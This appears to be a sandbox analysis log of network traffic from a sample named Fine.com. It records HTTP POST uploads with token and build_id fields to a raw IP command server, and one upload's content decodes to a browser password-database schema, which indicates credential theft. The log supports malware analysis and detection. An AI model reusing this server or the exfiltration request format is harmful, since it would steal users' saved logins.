                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:22:59 GMT
                                                                                                                                                                                                                                                                                                                          Server: Playlog
                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                          Expires: Sun, 12 Jan 2025 16:22:59 GMT
                                                                                                                                                                                                                                                                                                                          Cache-Control: private
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:59 UTC137INData Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a
                                                                                                                                                                                                                                                                                                                          Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          12192.168.2.549969195.201.141.1064431440C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:59 UTC182OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----UAS0ZU3EUA1NYMY58GLX
                                                                                                                                                                                                                                                                                                                          Host: 195.201.141.106
                                                                                                                                                                                                                                                                                                                          Content-Length: 505
                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:22:59 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 55 41 53 30 5a 55 33 45 55 41 31 4e 59 4d 59 35 38 47 4c 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 66 62 31 62 30 37 30 65 35 33 32 61 39 65 63 38 34 64 65 37 35 66 61 34 35 30 35 34 37 63 0d 0a 2d 2d 2d 2d 2d 2d 55 41 53 30 5a 55 33 45 55 41 31 4e 59 4d 59 35 38 47 4c 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 31 64 34 63 63 38 35 35 64 64 36 66 36 33 35 30 61 31 65 61 64 66 36 37 32 30 61 64 31 63 66 0d 0a 2d 2d 2d 2d 2d 2d 55 41 53 30 5a 55 33 45 55 41 31 4e 59 4d 59 35 38 47 4c 58 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                          Data Ascii: ------UAS0ZU3EUA1NYMY58GLXContent-Disposition: form-data; name="token"effb1b070e532a9ec84de75fa450547c------UAS0ZU3EUA1NYMY58GLXContent-Disposition: form-data; name="build_id"a1d4cc855dd6f6350a1eadf6720ad1cf------UAS0ZU3EUA1NYMY58GLXCont
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:00 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:00 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:00 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          13192.168.2.549978195.201.141.1064431440C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:00 UTC185OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----1VSRIWTJM7G47Q90HLN7
                                                                                                                                                                                                                                                                                                                          Host: 195.201.141.106
                                                                                                                                                                                                                                                                                                                          Content-Length: 213453
                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:00 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 31 56 53 52 49 57 54 4a 4d 37 47 34 37 51 39 30 48 4c 4e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 66 62 31 62 30 37 30 65 35 33 32 61 39 65 63 38 34 64 65 37 35 66 61 34 35 30 35 34 37 63 0d 0a 2d 2d 2d 2d 2d 2d 31 56 53 52 49 57 54 4a 4d 37 47 34 37 51 39 30 48 4c 4e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 31 64 34 63 63 38 35 35 64 64 36 66 36 33 35 30 61 31 65 61 64 66 36 37 32 30 61 64 31 63 66 0d 0a 2d 2d 2d 2d 2d 2d 31 56 53 52 49 57 54 4a 4d 37 47 34 37 51 39 30 48 4c 4e 37 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                          Data Ascii: ------1VSRIWTJM7G47Q90HLN7Content-Disposition: form-data; name="token"effb1b070e532a9ec84de75fa450547c------1VSRIWTJM7G47Q90HLN7Content-Disposition: form-data; name="build_id"a1d4cc855dd6f6350a1eadf6720ad1cf------1VSRIWTJM7G47Q90HLN7Cont
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:02 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:02 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          14192.168.2.549988195.201.141.1064431440C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:01 UTC184OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----1VSRIWTJM7G47Q90HLN7
                                                                                                                                                                                                                                                                                                                          Host: 195.201.141.106
                                                                                                                                                                                                                                                                                                                          Content-Length: 55081
                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:01 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 31 56 53 52 49 57 54 4a 4d 37 47 34 37 51 39 30 48 4c 4e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 66 62 31 62 30 37 30 65 35 33 32 61 39 65 63 38 34 64 65 37 35 66 61 34 35 30 35 34 37 63 0d 0a 2d 2d 2d 2d 2d 2d 31 56 53 52 49 57 54 4a 4d 37 47 34 37 51 39 30 48 4c 4e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 31 64 34 63 63 38 35 35 64 64 36 66 36 33 35 30 61 31 65 61 64 66 36 37 32 30 61 64 31 63 66 0d 0a 2d 2d 2d 2d 2d 2d 31 56 53 52 49 57 54 4a 4d 37 47 34 37 51 39 30 48 4c 4e 37 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                          Data Ascii: ------1VSRIWTJM7G47Q90HLN7Content-Disposition: form-data; name="token"effb1b070e532a9ec84de75fa450547c------1VSRIWTJM7G47Q90HLN7Content-Disposition: form-data; name="build_id"a1d4cc855dd6f6350a1eadf6720ad1cf------1VSRIWTJM7G47Q90HLN7Cont
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:01 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:01 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:01 UTC6016OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
